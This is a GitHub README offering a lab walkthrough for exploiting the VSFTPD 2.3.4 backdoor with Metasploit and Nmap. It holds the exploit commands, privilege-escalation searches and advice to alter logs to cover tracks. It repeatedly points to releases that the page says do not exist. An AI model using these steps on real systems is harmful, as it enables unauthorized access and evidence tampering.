Skip to content

Hands-on exploitation of the VSFTPD 2.3.4 backdoor vulnerability using Metasploit to gain shell access, create users, modify logs, and attempt privilege escalation in a secure lab environment.

Notifications You must be signed in to change notification settings

Daniel1234mata/vsftpd-backdoor-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

VSFTPD Backdoor Exploit 🚀

Welcome to the VSFTPD Backdoor Exploit repository! This project demonstrates the hands-on exploitation of the VSFTPD 2.3.4 backdoor vulnerability. By utilizing Metasploit, you can gain shell access, create users, modify logs, and attempt privilege escalation in a secure lab environment.

Download Release

Table of Contents

Introduction

The VSFTPD 2.3.4 backdoor vulnerability allows attackers to gain unauthorized access to systems running this version of the VSFTPD server. This repository provides a structured approach to exploit this vulnerability using Metasploit, a powerful penetration testing framework.

Prerequisites

Before you begin, ensure you have the following installed:

  • Kali Linux or any Linux distribution with Metasploit.

  • Metasploit Framework: You can install it using the following command:

    sudo apt-get install metasploit-framework
  • Nmap: A network scanning tool that can be installed via:

    sudo apt-get install nmap

Installation

  1. Clone the repository:

    git clone https://github.com/Daniel1234mata/vsftpd-backdoor-exploit.git
    cd vsftpd-backdoor-exploit
  2. Ensure all dependencies are installed:

    sudo apt-get install -y metasploit-framework nmap

Usage

To exploit the VSFTPD backdoor vulnerability, follow these steps:

  1. Start Metasploit:

    msfconsole
  2. Use the exploit module:

    use exploit/unix/ftp/vsftpd_234_backdoor
  3. Set the target IP address:

    set RHOST <target_ip>
  4. Execute the exploit:

    exploit
  5. You should now have shell access to the target system.

For detailed steps and commands, refer to the Releases section.

Exploit Details

The VSFTPD 2.3.4 backdoor vulnerability is a well-known issue that allows remote attackers to execute arbitrary commands. The vulnerability lies in the way the server handles certain FTP commands, specifically when a backdoor command is sent.

How it Works

  1. The attacker connects to the VSFTPD server.
  2. The attacker sends a specially crafted command.
  3. The server executes the command, granting the attacker shell access.

Features

  • Shell Access: Gain immediate access to the target system.
  • User Management: Create, modify, or delete users on the target system.
  • Log Modification: Alter logs to cover tracks.
  • Privilege Escalation: Attempt to gain higher privileges on the system.

Log Analysis

Understanding logs is crucial for any ethical hacking operation. The following steps can help you analyze logs effectively:

  1. Access Logs: Review the FTP access logs to identify unauthorized access attempts.
  2. Modify Logs: If needed, modify logs to erase traces of exploitation.

Example Log Commands

To view the logs, use:

cat /var/log/vsftpd.log

To modify logs, you can use:

echo "Unauthorized access attempt" >> /var/log/vsftpd.log

Privilege Escalation

After gaining shell access, you may want to escalate your privileges. Here are some common methods:

  1. Check for SUID binaries:

    find / -perm -4000 -type f 2>/dev/null
  2. Kernel Exploits: Search for known kernel exploits that apply to the version of the operating system.

  3. Password Files: Check for password files that may contain weak or default passwords.

Nmap Scripts

Nmap can be used to scan for vulnerable VSFTPD instances. Here’s how to do it:

  1. Run a basic scan:

    nmap -sV <target_ip>
  2. Use Nmap scripts to check for the VSFTPD vulnerability:

    nmap --script ftp-vsftpd-backdoor -p 21 <target_ip>

Contributing

Contributions are welcome! If you have suggestions for improvements or additional features, please fork the repository and submit a pull request.

License

This project is licensed under the MIT License. See the LICENSE file for details.

Acknowledgments

For more detailed instructions and to download the latest version of this project, visit the Releases section.

About

Hands-on exploitation of the VSFTPD 2.3.4 backdoor vulnerability using Metasploit to gain shell access, create users, modify logs, and attempt privilege escalation in a secure lab environment.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •